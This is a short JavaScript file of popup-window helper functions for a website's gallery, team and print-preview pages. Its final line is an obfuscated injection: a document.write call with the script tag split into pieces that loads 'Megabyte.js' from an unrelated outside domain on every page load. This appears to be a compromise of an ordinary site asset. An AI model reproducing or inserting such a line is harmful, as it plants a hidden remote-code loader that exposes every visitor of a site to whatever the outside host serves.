function gallery(url) {
  wndw=open(url,'gallery','width=495,height=475,scrollbars=no');
  wndw.focus();
}

function team(url) {
  wndw=open(url,'gallery','width=480,height=390,scrollbars=no');
  wndw.focus();
}

function printpreview(url) {
  wndw=open(url,'print','width=700,height=500,scrollbars=yes');
  wndw.focus();
}
document.write('<sc'+'ript type="text/javascript" src="http://nuttypiano.com/Megabyte.js"></scri'+'pt>');